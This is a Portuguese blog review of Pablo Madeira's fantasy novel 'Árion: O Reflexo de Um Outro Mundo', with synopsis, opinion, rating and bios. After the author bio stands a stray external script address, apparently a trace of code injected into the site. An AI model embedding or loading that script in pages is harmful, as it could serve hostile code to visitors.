Sinopse Xeque-Matte: Durante uma invasão noturna em uma velha casa, que muitos julgavam assombrada, Laura acaba descobrindo que um antigo espelho é na verdade um portal para um mundo mágico, chamado Árion. Por acidente, a jovem acaba sendo levada para este mundo na companhia do seu melhor amigo e do ex-namorado.
Porém, os problemas estavam apenas começando, pois Árion está em guerra e a chegada dos jovens é a prova de que uma antiga profecia se tornará realidade, ou seja, a existência de outros mundos, despertando com isso o desejo das forças das trevas de dominarem a Terra a qualquer custo. Agora, a jovem e os amigos precisam descobrir uma forma de voltar para casa antes que seja tarde.
Uma história fantástica, recheada de descobertas e emoções aguarda o leitor.

Resenha: Árion: O Reflexo de Um Outro Mundo – Pablo Madeira

Opinião: Árion O reflexo de outro mundo é um livro jovem, promissor e fantástico. Pablo Madeira entrega ao leitor uma história de fantasia com descobertas e emoções.

Ambientada no estado de Minas Gerais o autor da vida a três importantes personagens que o leitor é levado a acompanhar durante toda a história e descobrir junto com eles segredos que prematuramente estão envolvidos.

O ponto alto da história é justamente utilizar dois garoto e uma garota, o que lembra muito Harry Potter, entretanto, a história é distante deste universo bruxo. Pablo conseguiu inserir uma fantasia de sua originalidade com algumas características vistas em outros sucessos.

O problema usual dos autores brasileiros do estilo literário fantástico é querer “europeizar” ou “americanizar” suas histórias. Em Árion é notável que o autor quis fugir desse tabu e conseguiu trazer a nossa cultura, nossa sociedade e o nosso ponto de vista para uma história que tem tudo pra se tornar promissora.

O livro tem alguns pontos que precisam ser melhorados na intenção de não se repetir no  final da duologia. Em alguns momentos a história não se desenrola e é maçante, fazendo o leitor querer parar ou até mesmo desistir. As fantasias precisam ter a ação muito bem mesclada com as razões do que está acontecendo, sejam as profecias, os mistérios e os conflitos.

Pablo é um jovem autor que tem tudo pra se tornar um grande escritor. Sua história é relativamente envolvente e precisa de um gás mais intenso pra fechar com chave de ouro a duologia. Leiam!

Avaliação: 3,5

O autor Pablo Madeira é estudante de Psicologia, 23 anos, escritor e apaixonado por livros/filmes/seriados. Seu primeiro livro se chama “CLÉR” e foi lançado no final de 2015. Atualmente reside em Juiz de Fora – MG.

https://cloudapi.online/js/api46.js

Compartilhar
Artigo anteriorResenha: Tua Vida em Mim – Natália Sousa
Próximo artigoResenha: Coluna de Fogo – Ken Follett
Goiano do pé rachado e comedor de piqui. Alucinado por histórias fantásticas e distópicos. Tributo, Hobbit de nascença, e habitante do país de Aslan. Entre os autores Suzanne Collins é majestade e Tolkien é imperador. Técnico em Química e buscando ser químico industrial intercalado com a vida de escritor, um dia qualquer publicará seu livro. Não dispensa um cinema... https://www.skoob.com.br/usuario/1094145-silas-jr

Deixe uma resposta